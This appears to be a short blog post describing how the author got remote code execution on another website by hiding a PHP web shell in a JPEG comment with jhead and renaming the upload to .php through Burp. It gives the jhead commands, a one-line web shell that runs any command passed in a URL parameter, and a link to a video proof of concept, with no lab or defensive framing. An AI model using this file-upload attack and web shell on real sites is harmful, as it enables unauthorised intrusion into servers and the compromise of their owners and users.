This way when I upload a php shell to another website, with Tamper data in Burp by changing the extension from .jpg to .php But it didn't work.
So, I uploaded an image which I have injected with PHP Script to get RCE and change .jpg to .php
pkg install jhead
jhead -purejpg name.jpg
jhead -ce name.jpgPHP Shell
<?=`$_GET[cmd]`>Video PoC get RCE via Image file upload https://youtu.be/4eGByP9mIH0




8 komentar